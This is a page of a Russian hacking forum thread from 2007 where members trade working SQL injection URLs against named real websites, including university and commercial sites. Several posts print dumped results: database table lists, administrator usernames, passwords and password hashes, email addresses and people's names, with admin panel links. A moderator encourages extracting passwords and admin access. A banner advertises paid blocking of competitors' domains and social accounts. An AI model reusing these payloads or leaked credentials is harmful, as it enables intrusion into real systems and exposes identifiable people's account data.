Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 255 из 1242

255

Опции темы

Поиск в этой теме

Опции просмотра

#2541

19.06.2007, 13:52

l1ght

Reservists Of Antichat - Level 6

Регистрация: 05.12.2006

Сообщений: 195

Провел на форуме:
14023893

Репутация: 2163

Цитата:

Сообщение от Nekt

Код:

http://ipodmania.ru/index.php?state=catalogs&activeCategory=181-1

Пустышка?

Код:

http://ipodmania.ru/index.php?state=catalogs&activeCategory=184+union+select+1,concat(login,0x3a,password)+from+user/*

угук вывода нет (

н:

Код:

http://hspbru.majordomo.ru/?do=structure&pid=1&id=-1+union+select+version(),user()/*

Код:

http://hosting.rbc.ru/ru/support/cron/?id35=-1'+union+select+1,2,3,4,5,6,7,8,convert(concat_ws(0x3b,user(),database(),version())+using+cp1251),10,11/*

Код:

http://ru-hosting.ru/news.php?hnews_id=-1+union+select+1,2,concat(0x3d,user(),version(),name,pass),4,5+from+users/*

Код:

http://sevinfo3.valuehost.ru/cbs/showalmanah.php?almanac_code=-1+union+select+1,concat(0x3a,user(),version(),database()),3,4,5,6/*

#2542

19.06.2007, 15:37

0xA1isa

Новичок

Регистрация: 19.06.2007

Сообщений: 8

Провел на форуме:
218478

Репутация: 23

blind, кажется

Код:

http://www.okolosport.ru/transfers/leagues/en_epl.php?tw_id=4&club_id=66+union+select+1,2,3,4,5,6,2,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47&lang=rus

#2543

19.06.2007, 19:55

Grey

AMA - Level 2

Регистрация: 10.06.2006

Сообщений: 1,113

Провел на форуме:
17668503

Репутация: 5826

Код:

http://www.pr.kg/n/detail.php?id=-1+union+select+1,2,3,4,concat(database(),char(58),user(),char(58),version()),6,7,8,9,10,11,12,13,14,15,16,17,18/*

prkg:prkg@localhost:5.0.37-log

Код:

http://www.pr.kg/n/detail.php?id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables+limit+16,1/*

Код:

banner
group_membership
groups
keywords
krena
modify_diff
modify_mod_now
module_vars
news
news_category
or_news
perm_group
poll
poll_comment
poll_config
poll_data
poll_index
poll_ip
poll_log
poll_templates
poll_templateset
poll_user
pollip
pr_comments
pr_head
pr_news
pr_partners
pr_source
pr_titles
pr_user_online
reg_vars
session_info
sniffer_country
sniffer_hits
sniffer_hosts
sniffer_ip2c
sniffer_os
sniffer_point_out
sniffer_res_depth
sniffer_search_engines
sniffer_urls
sniffer_user_agent
structure_info
tbl_admlogins
tbl_admlogs
tbl_sessions
trigger_log
users
vars

-----------------
tbl_admlogins
-----------------

Код:

http://www.pr.kg/n/detail.php?id=-1+union+select+1,2,3,4,concat(pk_alId,char(58),alUserName,char(58),alPass,char(58),alEmail,char(58),alFName,char(58),alLName,char(58),alSecLevel,char(58),alDateJoined),6,7,8,9,10,11,12,13,14,15,16,17,18+from+tbl_admlogins+limit+0,1/*

3:askar:271983:askar@kaf-i.kg:Askar:Makeshov:2:10/02/05
6:jama:jama:jama@infotel:Джамиля:Мамшева:2:24/04/2007
7:pizdec:pizdec::haker::2:14/06/2007 - кто то свосем не давно побаловался)

http://www.pr.kg/n/adm - админка1
http://www.pr.kg/or/adm - админка2

#2544

19.06.2007, 20:47

~~Серенький~~

Banned

Регистрация: 13.04.2007

Сообщений: 123

Провел на форуме:
921520

Репутация: 572

Цитата:

Код:
http://www.euro-honey.com/shop/product_info.php?products_id=166+limit+0+UNION+SEL ECT+null,concat(user(),0x3a,version())/*

нашел только таблицу admin, да и то, поля не мог найти

http://www.euro-honey.com/shop/product_info.php?products_id=166+limit+0+UNION+SEL ECT+null,concat_ws(0x3a,admin_id,admin_password,ad min_lastname)+from+admin/*

//там еще табличка products

///

Цитата:

lothlorian

пожалуйста помогите ломануть shram.kiev.ua/forum

тебе в тему 'просьбы о взломах'

Последний раз редактировалось Серенький; 19.06.2007 в 21:21..

#2545

19.06.2007, 21:20

V.I.P

Познающий

Регистрация: 06.04.2007

Сообщений: 77

Провел на форуме:
1062869

Репутация: 136

Отправить сообщение для V.I.P с помощью ICQ

Код HTML:

http://www.tppmo.ru/index.php?id=23'&page='+union+select+1,2,3,concat(username,char(58),password),5,6+from+admin/*

1:446df2be0c8667f2

http://www.tppmo.ru/admin/

_http://www.vaal.ru/show.php?id=1+union+select+1,2,3,4,5,6,7,8,version (),10,11/*

_http://www.k-gb.ru/object.php?id=4+union+select+version()/*

#2546

19.06.2007, 21:22

Grey

AMA - Level 2

Регистрация: 10.06.2006

Сообщений: 1,113

Провел на форуме:
17668503

Репутация: 5826

Что бы избежать дальнейших накруток и притензий, ограничтесь при выставление репутации в этой теме её колличеством от 1 до 3.

Многие инъекции, которые вы выкладываете, "не доведены до ума", иногда кажется, что это всё выкладывается только, что бы запостить пост и показать, что ты умеешь делать sql инъекции, в результате получается большая активность. Только толку от неё нету, пробуйте не просто подбирать кол-во колонок, выводить инфу о БД, но и подбирать таблицы и имена колонок - получать пароли пользователей, доступ в админку. Это и интереснее и имеет хоть какой то смысл, в отличие от тупого выкладывания большого кол-ва инъекций.

При оценивание постов в этой теме, старайтесь сделать это как можно более рационально - не стоит ставить +3 за не полностью раскрученную инъекцию.

Инъекции вида:

http://site.ru/index.php?a='

будут удаляться.

Последний раз редактировалось Grey; 20.06.2007 в 00:29..

#2547

19.06.2007, 23:00

Ky3bMu4

Постоянный

Регистрация: 03.02.2007

Сообщений: 520

Провел на форуме:
1777536

Репутация: 932

Отправить сообщение для Ky3bMu4 с помощью ICQ

com и edu.

Код:

http://www.firmmagazine.com/members/news.php?id=-702+union+select+1,version(),user(),4,5,6,7,database(),9,10,11/*
http://its.med.yale.edu/announcements/announce.php?id=-334+union+select+version(),2,user(),4,5,6,7,8,database()/*

#2548

20.06.2007, 12:15

SWAT

Участник форума

Регистрация: 14.12.2006

Сообщений: 211

Провел на форуме:
1541753

Репутация: 552

http://host21.ru/index.php?id=-9+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12 +from+INFORMATION_SCHEMA.TABLES+limit+17,1/*

#2549

20.06.2007, 12:36

SWAT

Участник форума

Регистрация: 14.12.2006

Сообщений: 211

Провел на форуме:
1541753

Репутация: 552

http://www.snezhny.com/autors.php?id=-284+UNION+SELECT+concat(id,char(58),name,char(58), pass,char(58),email),2,3,4,5,6,7,8,9+from+user+lim it+3000,1/*

#2550

20.06.2007, 14:18

Zitt

Познавший АНТИЧАТ

Регистрация: 07.05.2006

Сообщений: 1,031

Провел на форуме:
5885100

Репутация: 773

Отправить сообщение для Zitt с помощью ICQ

http://dma.ucla.edu/gallery/faculty_gallery.php?ID=-9999+union+select+1,2,3,USER(),VERSION(),6,7,8,9,1 0,11,12/*

Страница 255 из 1242

255

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход